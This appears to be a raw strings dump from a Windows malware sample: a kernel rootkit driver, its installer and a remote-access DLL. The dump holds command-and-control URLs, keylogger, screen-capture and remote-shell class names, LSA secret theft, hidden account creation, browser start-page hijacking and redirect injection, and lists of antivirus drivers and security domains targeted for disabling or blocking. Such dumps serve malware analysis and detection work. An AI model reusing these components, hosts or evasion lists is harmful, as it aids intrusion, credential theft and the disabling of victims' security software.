hbztrljebwuomgeywrojhbztrljebwuon DOS mode.
Richh_(
`.rdata
@.data
@.reloc
L$@]_^[3
L$@]_^[3
L$|QSSj
T$8SRf
L$4QSSj
D$4PSSj
T$$Rj
D$4PSSj
SSSSSSSj
L$(QWPV
L$(QPVW
T$8SRf
L$4QSSj
_VVVVV
@@f90u
f90t3W
AAf91u
0A@@Ju
0WWWWW
AAFFf;
>=Yt1j
QQSVWh
j@j ^V
URPQQh
0SSSSS
0SSSSS
0SSSSS
t"SS9]
PPPPPPPP
PPPPPPPP
;t$,v-
UQPXY]Y[
t+WWVPV
CorExitProcess
runtime error
TLOSS error
SING error
DOMAIN error
An application has made an attempt to load the C runtime library incorrectly.
Please contact the application's support team for more information.
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
EncodePointer
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
� !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
� !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
� !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
NetUserAdd
NetLocalGroupAddMembers
CreateProcessW
RtlInitUnicodeString
ZwLoadDriver
RtlFreeUnicodeString
C:\Program Files\VMware\VMware Tools\VMwareUser.exe
C:\Program Files\VMware\VMware Tools\VMwareTray.exe
C:\Program Files\Internet Explorer\iexplore.exe
http://xytets.com:2345/t.asp?ver=xxx&mac=0-0-0-0&os=vm
\\.\NtHook
rundll32.exe safemon.dll hook2
c:\Temp
http://xytets.com:2345/t.asp?os=wangba
http://xytets.com:2345/t.asp?os=home
\OK\KernelYK\bin\InstallSYS.pdb
ExitProcess
CreateFileA
GetFileSize
MapViewOfFile
UnmapViewOfFile
GetCurrentProcess
WaitForSingleObject
GetTickCount
WriteFile
LoadLibraryW
GetVersionExW
ReadFile
GetModuleFileNameW
CreateFileW
MultiByteToWideChar
GetLastError
GetProcAddress
Process32FirstW
CreateFileMappingW
Process32NextW
CreateToolhelp32Snapshot
WinExec
CloseHandle
DeleteFileW
KERNEL32.dll
CreateServiceW
CloseServiceHandle
OpenProcessToken
OpenSCManagerW
OpenServiceW
RegCreateKeyExW
LookupPrivilegeValueW
StartServiceW
ChangeServiceConfigW
AdjustTokenPrivileges
RegSetValueExW
ADVAPI32.dll
NetUserDel
NETAPI32.dll
CheckSumMappedFile
imagehlp.dll
HeapFree
HeapAlloc
GetStartupInfoW
TerminateProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
HeapCreate
VirtualFree
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
VirtualAlloc
HeapReAlloc
GetModuleHandleW
GetStdHandle
GetModuleFileNameA
TlsGetValue
TlsAlloc
TlsSetValue
TlsFree
InterlockedIncrement
SetLastError
GetCurrentThreadId
InterlockedDecrement
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
LCMapStringW
FreeEnvironmentStringsW
GetEnvironmentStringsW
GetCommandLineW
SetHandleCount
GetFileType
GetStartupInfoA
QueryPerformanceCounter
GetCurrentProcessId
GetSystemTimeAsFileTime
InitializeCriticalSectionAndSpinCount
RtlUnwind
LoadLibraryA
LCMapStringA
WideCharToMultiByte
GetStringTypeA
GetStringTypeW
GetLocaleInfoA
HeapSize
GetFileAttributesA
CreateDirectoryA
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
!This program cannot be run in DOS mode.
h.rdata
H.data
B.reloc
w)SSSS
p$SSSV
j0Xjbf
_8^!t�9]
8] tHSS
u5SSSS
tD9]$t$;u
URPQQh
UQPXY]Y[
NtCreateUserProcess
NtShutdownSystem
NtDeviceIoControlFile
NtQueryValueKey
NtCreateProcessEx
NtQueryDirectoryFile
HTTP/1
HOST:
REFERER:
REFERER:
114.112.36.195
119.147.146.35
119.147.146.16
119.147.146.31
119.161.218.126
122.228.113.10
114.112.36.116
119.147.146.59
119.147.146.58
119.147.146.57
119.147.146.47
61.164.154.210
61.164.154.218
121.14.11.61
122.228.113.9
114.112.36.114
119.147.146.218
119.147.146.88
119.147.146.87
119.147.146.86
61.164.154.215
119.147.146.52
119.147.146.54
119.147.146.53
119.147.146.51
61.164.154.223
218.6.25.204
119.147.146.50
119.161.218.29
119.147.146.56
61.129.69.28
121.14.11.177
114.112.36.113
211.103.159.111
219.238.235.66
219.238.233.196
219.238.237.137
219.238.237.149
219.238.237.133
220.181.126.17
218.6.23.40
220.181.66.96
59.57.12.78
220.181.24.13
119.188.2.221
125.46.41.169
125.46.41.165
221.204.202.40
220.181.156.231
220.181.141.115
220.181.141.114,
220.181.141.113
118.145.31.212
220.181.156.230
61.55.184.20
124.238.243.54
220.181.141.103
218.84.244.45
218.84.244.44
218.84.244.43
218.84.244.42
218.84.244.41
218.84.244.40
218.84.244.39
218.84.244.38
218.84.244.37
218.84.244.36
218.84.244.35
218.84.244.34
218.84.244.33
218.84.244.32
218.84.244.31
119.147.146.32
119.147.146.27
119.147.146.55
safemon.dll
CORAL.EXE
115BR.EXE
TTRAVELER.EXE
NAVIGATOR.EXE
SAFARI.EXE
CHROME.EXE
OPERA.EXE
THEWORLD.EXE
MAXTHON.EXE
FIREFOX.EXE
GREENBROWSER.EXE
360SE.EXE
SOGOUEXPLORER.EXE
QQBROWSER.EXE
IEXPLORE.EXE
EXPLORER.EXE
SERVICES.EXE
dw.ini
wm.ini
NtHook.sys
ehdrv.sys
epfwtdir.sys
TSKsp.sys
TCSafeBox.sys
TsFltMgr.sys
mp110003.sys
KVFg.sys
SysGuard.sys
Kvfw.sys
KSysCall.sys
360AntiArp.sys
sysmon.sys
kdhacker.sys
kisknl.s
kmodurl.sys
rfwtdi.sys
rsndisp.sys
hookport.sys
QQPCTRAY
TSVulFW
avtmon
ksfmon
safemon
www.xxooxxooxxoo.com
\ok\kernelyk\bin\i386\NtHook.pdb
PPPPPPPPPPPPPPPP
HTTP/1.1 302 Redirect
Location:
HTTP/1.1 307 Redirect
Location:
<html><frameset border=0 frameSpacing=0 rows="*,0" frameBorder=NO><frame name="main" marginWidth=0 marginHeight=0 noresize src="
"></iframe></frameset></html>
;ntosui
krnluY
.exeuI
8ntosu
KINGKLEISSNER
KINGKLEISSNER
XESPPhCRAP
!This program cannot be run in DOS mode.
h.rdata
H.data
.reloc
_8^!t�9]
8] tKSS
u7SSSS
!!!!!!!!!!Read Or Write HD Error Code====0x%x
IoCallDriver 0x%x fail 0x%x
RSDSWX^M
\ok\nthook\bin\i386\StartDriver.pdb
ObfDereferenceObject
ObReferenceObjectByName
IoDriverObjectType
RtlInitUnicodeString
IoFreeIrp
KeSetEvent
IoFreeMdl
MmUnlockPages
DbgPrint
ExFreePoolWithTag
KeWaitForSingleObject
IofCallDriver
KeInitializeEvent
IoBuildAsynchronousFsdRequest
ZwClose
ZwSetValueKey
ZwCreateKey
ZwLoadDriver
ZwWriteFile
ZwCreateFile
ExAllocatePool
memset
KeTickCount
KeBugCheckEx
ntoskrnl.exe
80G0P0b0}0
2F2f2o2
3M4p4|4
5�5J5^5r5
0�0$0-040
!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
SUVWh +
D$(UVW
L$4_^]3
L$(QPj
L$ hT0
D$ hx0
D$@PSf
L$`QhL3
L$tQhL3
D$XPhK,
D$lPhK,
T$8Rhp4
D$xqz_
D$#hK,
T$XRhK,
D$ujcP
L$XQhK,
D$@VWj1
L$H_^3
uSj2Ph,
NhQh83
FhPh83
T$4RAW
D$ Ph?
t59|$ t/
tA<\u/
PWWWWWV
C<At?<Bt;j
|$D.tZ
T$pRWV
D$pPWV
L$(QRV
L$ _^]3
L$`hX8
$RVhl8
T$ RWWWP
D$@PUQR
L$ Qh?
T$HRVVVP
L$@RPQ
D$0RPV
D$4;D$
L$(Qh`/
PQSUVW
|$$SQR
F(RPSS
PQSUVW
~0;~,}
VDPQRUSP
NPRPUSj
|$ ;\$
t$P9t$(
f9D$<u%
D$HPQ3
~(9~$u
W(9W$u
tZ9H tU9H$tP
Fdf+Fh
D$(8D*
T$LPQR
|$HPWS
T$(PQR
T$DPVS
T$LRWS
L$LQVS
|$ WUSV
D$$SUV
T$,RWV
T$,RWV
T$,RWV
L$,QWV
T$,RWV
L$ RUPj
9t$Tu�
T+3x%A
;D$<s!
T$,PQh
{4_^]3
^SSSSS
0SSSSS
_VVVVV
@@f90u
f90t3W
AAf91u
0WWWWW
AAFFf;
0SSSSS
0WWWWW
AAFFf;
0WWWWW
0WWWWW
tNIt?It0It
HHtXHHt
>If90t
j@j ^V
0A@@Ju
t"SS9]
>=Yt1j
URPQQh
^SSSSS
j"^SSSSS
0SSSSS
PPPPPPPP
PPPPPPPP
t+WWVPV
_VVVVV
^WWWWW
;t$,v-
UQPXY]Y[
0SSSSS
_VVVVV
<+t(<-t$:
+t HHt
QQSVWd
Ht�Hu4j
s[S;7|G;w
tR99u2
deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly
inflate 1.1.4 Copyright 1995-2002 Mark Adler
Unknown exception
(null)
`h````
xpxxxx
EncodePointer
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
CorExitProcess
runtime error
TLOSS error
SING error
DOMAIN error
An application has made an attempt to load the C runtime library incorrectly.
Please contact the application's support team for more information.
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
� !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
_nextafter
_hypot
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
`h`hhh
xppwpp
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
� !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
� !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
GAIsProcessorFeaturePresent
KERNEL32
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
CONOUT$
1#QNAN
1#SNAN
string too long
invalid string position
bad exception
GetCurrentProcessId
KERNEL32.dll
GetCurrentProcess
EnterCriticalSection
DeleteCriticalSection
VirtualFree
GetTickCount
OpenEventA
GetDiskFreeSpaceExA
GetVersionExA
MultiByteToWideChar
CancelIo
InitializeCriticalSection
CreateThread
WaitForSingleObject
SetEvent
GlobalSize
Process32First
GetCurrentThreadId
CreateToolhelp32Snapshot
LocalSize
TerminateProcess
RemoveDirectoryA
LocalReAlloc
FindNextFileA
TerminateThread
CreateEventA
GetLocalTime
HeapAlloc
SetFilePointer
WriteFile
CloseHandle
GetFileSize
CreateFileA
DeleteFileA
LocalFree
VirtualAlloc
GetSystemDirectoryA
LocalAlloc
ReadFile
LeaveCriticalSection
bad buffer
bad Allocate
WS2_32.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
WININET.dll
InternetCloseHandle
InternetOpenA
InternetOpenUrlA
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)
%s%d%s
GetProcessHeap
%d.%d.%d.%d
advapi32.dll
ConvertSidToStringSidA
xuetr.com
www.vccn.com.cn
znmq.com
mmsk.cn
luosoft.com
avast.com
mcafee.com
trendmicro.com
masterconn11.qq.com
dl_dir2.qq.com
geotrust.com
eset.eu
gj.qq.com
pdlxf_doctor.qq.com
fs_tcp_conn_doctor.qq.com
fs_report_doctor.qq.com
fs_conn_other_doctor.qq.com
fs_conn_doctor.qq.com
fs_conn_back_doctor.qq.com
xf_com_update_doctor.qq.com
cfg.xf.qq.com
c.pc.qq.com
eset.com
eset.com.cn
kaspersky.com
kaspersky.com.cn
micropoint.com.cn
antiy.com
antiyfx.com
jiangmin.com
jiangmin.info
sucop.com
kinsoft.com
pc120.com
ijinshan.com
duba.net
rising.net.cn
rising.com.cn
qh-lb.com
qihoo.com
360safe.com
360.cn
SnipeSword
WinHex
SysReveal
IceSword
Kernel Detective
PowerTool
HTTP/1.1
Connection: Close
\VarFileInfo\Translation
\StringFileInfo\%s\FileDescription
\StringFileInfo\%s\InternalName
\StringFileInfo\%s\LegalTradeMarks
\StringFileInfo\%s\OriginalFileName
\StringFileInfo\%s\ProductName
\StringFileInfo\%s\ProductVersion
SeDebugPrivilege
C:\Windows\System32\safemon.dll
kernel32.dll
LoadLibraryA
PUBWINCLIENT.EXE
FZCLIENT.EXE
BARCLIENT.EXE
CLSMN.EXE
CLIMN.EXE
SICENT.EXE
TLNBCLT.EXE
TLNBLDR.EXE
TLNBSRV.EXE
NBLASSIST.EXE
CLIENT.EXE
WXCLTAID.EXE
WBJFSYS.EXE
MKSERVER.EXE
MKDBRESTORE.EXE
FKCLIENT.EXE
MKCLIENT.EXE
NXPRUN.EXE
HINTCLIENT.EXE
SAFECENTER.EXE
SERVICESMANAGER.EXE
c:\windows\system32\wm.ini
hostnum
oldhost_
newhost_
xxooxxoo
about:blank
InternetShortcut
IconFile
IconIndex
startpagenum
startpage
process_
blockie
lockie
blockreg
lockreg
urlnum
URLLNK
filename_
iconfile_
IconIndex_
Folder_
\Microsoft\Internet Explorer\Quick Launch
jmpurlnum
jmpurl
oldUrl_
newUrl_
antinum
anti_file
ooxxooxx
cbtnum
domainnum
domain
domain_
ooxx@@
Allowdomainnum
Allowdomain
Allowdomain_
http://
/out.txt
Windows2003
WindowsXP
Windows2000
WindowsVista
Windows7
%s-%s-%s-%s-%s-%s
/t.asp?os=
/a.asp?ver=
\dw.ini
C:\Program Files\Internet Explorer\iexplore.exe
urlmon.dll
URLDownloadToFileA
C:\Windows\System32\wm.ini
CreateProcessA
CreateProcessW
Wininet.dll
InternetConnectA
\\.\NtHook
c:\windows\system32\gho.ini
explorer.exe
bad allocation
%s\shell\open\command
list<T> too long
Delete
Applications\iexplore.exe\shell\open\command
WinSta0\Default
Scroll
Num Lock
Insert
Snapshot
Execute
Select
DownArrow
RightArrow
UpArrow
LeftArrow
PageDown
PageUp
[CapsLock]
Backspace
:]%d-%d-%d %d:%d:%d
<Enter>
InterlockedExchange
SetCursorPos
USER32.dll
SetCapture
mouse_event
keybd_event
OpenClipboard
EmptyClipboard
GlobalAlloc
GlobalLock
GlobalUnlock
SetClipboardData
GlobalFree
CloseClipboard
GetClipboardData
SelectObject
gdi32.dll
CreateCompatibleDC
GetDesktopWindow
SetRect
ReleaseDC
CreateDIBSection
GetSystemMetrics
DeleteObject
GetCursorPos
CreateCompatibleBitmap
GetDIBits
BitBlt
LocalSystem
SYSTEM\CurrentControlSet\Services\%s
Description
\cmd.exe
Process32Next
OpenProcess
EnumProcessModules
PSAPI.DLL
GetModuleFileNameExA
OpenProcessToken
ADVAPI32.dll
LookupPrivilegeValueA
AdjustTokenPrivileges
SeShutdownPrivilege
IsWindowVisible
GetWindowTextA
GetWindowThreadProcessId
\OK\KernelYK\bin\safemon.pdb
VerQueryValueA
GetFileVersionInfoSizeA
GetFileVersionInfoA
VERSION.dll
VirtualFree
InitializeCriticalSection
LeaveCriticalSection
GetProcAddress
VirtualAlloc
LoadLibraryA
WaitForSingleObject
SetEvent
CreateEventA
InterlockedExchange
ResetEvent
CancelIo
CloseHandle
FreeLibrary
GetTickCount
lstrcmpA
lstrlenA
GetWindowsDirectoryA
WideCharToMultiByte
lstrcatA
GetPrivateProfileStringA
GetPrivateProfileSectionNamesA
lstrcpyA
CreateFileA
GetCurrentProcess
Process32First
CreateRemoteThread
OpenProcess
GetPrivateProfileIntA
VirtualFreeEx
GetModuleFileNameW
GetSystemDirectoryA
MultiByteToWideChar
GetLastError
CopyFileA
VirtualAllocEx
GetTempFileNameA
Process32Next
WritePrivateProfileStringA
DeviceIoControl
GetModuleHandleA
VirtualProtect
CreateToolhelp32Snapshot
GetVersionExA
WinExec
GetTempPathA
WriteProcessMemory
DeleteFileA
CreateThread
GetDriveTypeA
GetVolumeInformationA
GetFileAttributesA
CreateProcessA
CreateDirectoryA
FindFirstFileA
GetLogicalDriveStringsA
FindClose
LocalAlloc
MoveFileA
LocalFree
GetStartupInfoA
HeapAlloc
HeapFree
LocalReAlloc
PeekNamedPipe
WriteFile
TerminateThread
TerminateProcess
ReadFile
DisconnectNamedPipe
WaitForMultipleObjects
CreatePipe
GetSystemInfo
KERNEL32.dll
wsprintfA
PeekMessageA
KillTimer
SetTimer
GetMessageA
CharNextA
GetAsyncKeyState
GetWindowTextA
GetForegroundWindow
GetKeyState
LoadCursorA
BlockInput
DestroyCursor
MapVirtualKeyA
WindowFromPoint
SetRect
GetCursorInfo
ExitWindowsEx
PostMessageA
SetThreadDesktop
CloseDesktop
OpenInputDesktop
GetThreadDesktop
OpenDesktopA
GetUserObjectInformationA
USER32.dll
DeleteObject
DeleteDC
BitBlt
GDI32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
LsaOpenPolicy
LookupAccountNameA
LsaClose
IsValidSid
LsaRetrievePrivateData
LsaFreeMemory
OpenProcessToken
RegQueryValueExW
RegQueryInfoKeyW
RegDeleteKeyW
LookupPrivilegeValueA
RegOpenKeyExW
RegEnumKeyExW
AdjustTokenPrivileges
RegQueryValueA
RegSetValueExA
RegDeleteKeyA
RegEnumKeyExA
RegCreateKeyExA
RegDeleteValueA
RegEnumValueA
RegQueryInfoKeyA
OpenServiceA
CloseServiceHandle
DeleteService
EnumServicesStatusA
LockServiceDatabase
StartServiceA
ChangeServiceConfigA
QueryServiceStatus
OpenSCManagerA
QueryServiceConfigA
UnlockServiceDatabase
ControlService
RegOpenKeyA
ADVAPI32.dll
SHGetSpecialFolderPathA
SHGetFileInfoA
SHELL32.dll
WSAIoctl
WSASocketA
WS2_32.dll
InternetOpenUrlA
InternetReadFile
InternetOpenA
InternetCloseHandle
WININET.dll
UuidCreateSequential
RPCRT4.dll
NetUserAdd
NetLocalGroupAddMembers
NETAPI32.dll
WTSQuerySessionInformationA
WTSFreeMemory
WTSAPI32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
ExitThread
GetCurrentThreadId
GetCommandLineA
RaiseException
GetModuleHandleW
TlsGetValue
TlsAlloc
TlsSetValue
TlsFree
InterlockedIncrement
SetLastError
InterlockedDecrement
EnterCriticalSection
SetHandleCount
GetStdHandle
GetFileType
DeleteCriticalSection
HeapReAlloc
HeapCreate
HeapDestroy
ExitProcess
GetModuleFileNameA
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
LCMapStringA
LCMapStringW
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
GetEnvironmentStringsW
QueryPerformanceCounter
GetCurrentProcessId
GetSystemTimeAsFileTime
RtlUnwind
HeapSize
SetFilePointer
GetConsoleCP
GetConsoleMode
InitializeCriticalSectionAndSpinCount
GetStringTypeA
GetStringTypeW
GetLocaleInfoA
SetStdHandle
WriteConsoleA
GetConsoleOutputCP
WriteConsoleW
FlushFileBuffers
safemon.dll
need dictionary
incorrect data check
incorrect header check
invalid window size
unknown compression method
invalid bit length repeat
too many length or distance symbols
invalid stored block lengths
invalid block type
incompatible version
buffer error
insufficient memory
data error
stream error
file error
stream end
invalid distance code
invalid literal/length code
incomplete dynamic bit lengths tree
oversubscribed dynamic bit lengths tree
incomplete literal/length tree
oversubscribed literal/length tree
empty distance tree with lengths
incomplete distance tree
oversubscribed distance tree
.?AVtype_info@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVout_of_range@std@@
.?AVbad_exception@std@@
.?AVCBuffer@@
.?AVCClientSocket@@
.?AVCDialupass@@
.?AVCOneInfo@@
t.nodsafe.com
.?AVCManager@@
.?AVCFileManager@@
.?AVexception@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVbad_alloc@std@@
.?AVCKernelManager@@
.?AVCKeyboardManager@@
.?AVRegeditOpt@@
.?AVCRegistry@@
.?AVCRegManager@@
.?AVCScreenManager@@
.?AVCCursorInfo@@
.?AVCScreenSpy@@
.?AVServersManagement@@
.?AVCServersManager@@
.?AVCShellManager@@
.?AVCSystemManager@@
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
0$0H0Z0d0t0y0
5#585E5b5l5
969E9D;O;Y;d;n;y;
<K<Q<(>/>=>D>q>
?A?J?y?
1"2)2D2y2
5-676t6
7 7$7(7,7
8)8W8k8{8
8=9Z9b9x9
:a:|:d;~;
;6<;<S<]<
1 1\1z1
7+8w8-;
<;=J=S=Y=`=g=~=
5(6T6y6
7 7&8K8~8
9K:b:x:
5Q5V5e5
=6=;=M=
.0T0`0f0k0r0
2.2@2R2d2v2
3 373I3y3
:::R:X:t:
:W;a;};
<B=G=L=R=
?6?I?[?i?}?
515H5N5T5
5 7C7P7l7v7
959;9B9
<*</<5<O<f<l<
192`2x2}2
2W3a3g3
4#4=4T4Z4v4
9&9,9O9_9e9n9
:J:P:X:v:
;!;&;,;R;];b;i;o;t;{;
<"<(<.<T<_<d<j<p<{<
>B>^>f>
1 1(131{1
1G2X2g2m2
2'30363f3k3}3
="===r=
>5?]?m?
0#0)0>0o0t0z0
3C4I4O4V4^4d4l4q4v4{4
5*555B5S5o5}5
5�6%666V6_6k6s6
737D7K7g7
8=8Z8_8e8k8u8
9+959G9Z9m9
9*:0:9:M:`:j:u:
;3<A<h<
<O=c=r=
<0@0D0H0L0P0T0X0\0`0d0h0l0p0
1-1]1{1
4-5H5N5
718N8U8
9/:K:T:[:i:
;);P;W;u;
;3<F<^<s=
8�969H9
:�;:;G;l;
;&<,<i<
=+=1=E=g=
>->6>R>X>^>
0Y0k0z0
0I1[1j1
192K2Z2
2)3;3J3s3y3
6L6o6u6
9#9/9S9_9p9v9
;*;4;:;K;d;s;
<,<H<Q<o<u<
1H1Q1X1
20292@2U2h2n2
3'3X3^3h3z3
4&4-4]4n4
5&5-5?5R5d5}5
5F6[6k6v6
6A7\7p7
=(>,>0>4>8>B>k>
1(232S2
3"3;3{3
4C5S5m5y5
8L8h8l8p8t8x8
9-:H:L:P:T:X:
<8<<<@<D<H<S<f<
>C?U?z?
0�0>0I0\0j0x0
1%1,1J1V1`1j1
3�3F3V3
5 5$5(5,5054585n5
898H8e8
8094989<9@9D9H9L9P9T9X9\9`9d9h9y9
:6:<:A:I:^:c:{:
<!<&<4<9<E<J<X<]<k<p<
1$1,1u1
3�3$33383H3
4*4/494@4
5(5-525:5B5G5^5c5
7�7F7L7m7
8X9_9|9
; ;W;f;q;
<$<E<X<f<
=E=X=f={=
>3>C>X>x>
?#?0?E?
1&1I1]1
3Z3e3v3
4'484f4
6"6C6T6e6w6
6074787<7O7b7
888=8D8K8
8I9p9{9
:$:):2:v:
;D<K<`<
<)=@=a={=
=4>=>B>^>j>y>
>&?-?6?f?x?
*0J0c0n0
2*2g2w2~2
4"595?5t5
9*9;9B9Y9_9t9
:!:&:,:i:
; ;,;5;T;b;s;
<-<=<J<j<p<v<
364n4}4
9H<}<;=
3 5$5(5,5054585<5@5D5H5L5P5T507@7J7!9/9K:Y:
�3+4�5
8P:T:X:\:`:d:h:l:p:t:
1:1c1}1
8!8(8,8084888<8@8D8
9,93989<9@9a9
9*:0:4:8:<:
8}9C;r=
2"3)3/3T3\3l3
4^4c4m4
5.5^5z5
7�7'737<7A7G7Q7Z7e7q7v7
;%;1;=;b;k;t;
< <_<c<g<k<o<s<w<{<
?!?J?O?f?
030?1F1Q2
>2>9>`>f>q>}>
?�?4?E?Q?_?e?q?w?
0.0n0t0
112A2G2S2Y2i2o2
3"3'3-31373<3B3G3V3l3w3|3
42585R5a5n5z5
>[>s>z>
?�?(?;?_?
0"0'0j2x2~2
343:3E3J3R3X3b3i3}3
;$;-;@;J;V;_;g;q;w;};
= =(=8=M=
?+?4?;?D?
0&080\0
3&3Z3e3o3
6)6<6N6i6q6y6
7A7R7u7:8d8
0X1)2@3t3
3*4_4x4
5 5$5n5t5x5|5
6 6A6k6
8�8=8Q8W8
8R9X9q9w9X:a:m:
;�;.;f;p;
=:>@>V>a>x>
?1?c?|?
0!0)050Y0a0m0
0$1*161
=8>g> ?
90Y0I1r1
:.:;:@:N:);L;W;z;
<0<`<{<
= =%=5=d=r=
>(?7?S?a?g?w?|?
2;3H5Z5l5
<.<b<h<t<
5v6G8P8|8
<#<)<?<Z<
>�?)?~?
3-5:7@7E7K7R7d7
6k82:8:>:D:J:P:V:\:b:h:n:t:
;);I;V;\;b;h;n;
9�:,:*<
"0J0z0
6!6&6,63686A6F6L6S6X6a6f6l6s6x6
7!7&7,73787A7F7L7S7X7a7f7l7s7x7
8!8&8,83888A8F8L8S8X8a8f8l8s8x8
9!9&9,93989A9F9L9S9X9a9f9l9s9x9
:!:&:,:3:8:A:F:L:S:X:a:f:l:s:x:
;!;&;,;3;8;A;F;L;S;X;a;f;l;s;x;
<!<&<,<3<8<A<F<L<S<X<a<f<l<s<x<
=!=&=,=3=8=A=F=L=S=X=a=f=l=s=x=
>!>&>,>3>8>A>F>L>S>X>a>f>l>s>x>
?!?&?,?3?8?A?F?L?S?X?a?f?l?s?x?
0!0&0,03080A0F0L0S0X0a0f0l0s0x0
1!1&1,13181A1F1L1S1X1a1f1l1s1x1
2!2&2,23282A2F2L2S2X2a2f2l2s2x2
3!3&3,33383A3F3L3S3X3a3f3l3s3x3
4!4&4,43484A4F4L4S4X4a4f4l4s4x4
5!5&5,53585A5F5L5S5X5a5f5l5s5x5
6!6&6,63686A6F6L6S6X6a6f6l6s6x6
7!7&7,73787A7F7L7S7X7a7f7l7s7x7
8!8&8,83888A8F8L8S8X8a8f8l8s8x8
9!9&9,93989A9F9L9S9X9a9f9l9s9x9
:!:&:,:3:8:A:F:L:S:X:a:f:l:s:x:
;!;&;,;3;8;A;F;L;S;X;a;f;l;s;x;
